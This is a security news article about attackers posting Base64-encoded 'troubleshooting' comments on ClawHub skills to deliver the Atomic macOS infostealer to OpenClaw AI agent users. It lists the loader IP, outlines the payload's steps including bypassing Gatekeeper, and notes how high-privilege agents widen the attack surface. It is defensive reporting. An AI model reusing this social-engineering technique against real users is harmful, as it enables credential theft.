Attackers Weaponize ClawHub Comments to Deliver Infostealers

The AI agent ecosystem can't catch a break. Researchers at OpenGuardrails discovered attackers are now posting malicious comments on legitimate ClawHub skills to deliver the Atomic macOS (AMOS) infostealer—a technique that sidesteps the platform's existing security scanning entirely.

This marks the third distinct attack vector targeting OpenClaw users this month. We covered the 341 malicious skills distributing Atomic Stealer three weeks ago, and researchers documented Vidar infostealer targeting OpenClaw configuration files shortly after. Now attackers don't even need to publish malicious skills—they just leave poisoned comments on popular legitimate ones.

Attack Mechanism

The operation targets comments on popular, trusted skills for services like Trello, Slack, and other productivity tools. Attackers post what appear to be helpful troubleshooting suggestions—the kind of community support users expect in a skill repository.

The "fix" contains Base64-encoded text. When decoded and executed, the payload:

1. Downloads a shellcode loader from infrastructure at 91.92.242.30
2. Removes macOS quarantine attributes to bypass Gatekeeper protections
3. Delivers and executes the Atomic macOS (AMOS) infostealer

The attack works because ClawHub's security scanning analyzes skill packages, not user comments. As the OpenGuardrails team noted: "This payload was delivered as encoded text inside a comment, which significantly reduced the likelihood of detection by users and security scanners."

Technical Indicators

Indicator	Value
Malware Family	Atomic Stealer (AMOS)
Delivery Method	Base64-encoded comment text
Infrastructure IP	91.92.242.30
Target Platform	macOS

The infrastructure at 91.92.242.30 was previously linked to the ClawHavoc campaign that distributed malicious skills—suggesting the same operators are behind this comment-based technique.

Why Comment-Based Attacks Work

ClawHub follows a model similar to GitHub Issues or npm package discussions: comments are community-driven and largely unmoderated. The platform's security focus centers on skill packages themselves, which undergo VirusTotal scanning before publication.

But text comments bypass that entirely. A Base64 blob looks like gibberish to casual observers but decodes trivially. Users troubleshooting a legitimate skill installation might follow "helpful" advice without recognizing the danger.

Broader AI Agent Security Concerns

The rapid adoption of AI agents like OpenClaw creates new attack surfaces that security tooling hasn't caught up with. These agents run with significant system privileges—reading files, executing commands, making network requests—and extend capabilities through third-party "skills" that users install with minimal vetting.

Traditional browser extension security models don't translate directly. When an AI agent can execute shell commands on your behalf, the stakes of a malicious extension are far higher than a rogue browser add-on stealing cookies.

For security teams evaluating AI agent adoption, consider:

• Skill vetting processes beyond automated scanning
• Sandboxing agent execution environments where possible
• Network monitoring for connections to unexpected infrastructure
• User education about social engineering tactics in technical communities

Recommendations for OpenClaw Users

Be skeptical of troubleshooting advice in ClawHub comments, especially suggestions involving Terminal commands or encoded text. If a skill isn't working, check the official documentation or repository issues rather than following anonymous comment suggestions.

Report suspicious comments to ClawHub moderators for account banning. The platform's response to this campaign will indicate whether comment moderation becomes a security priority.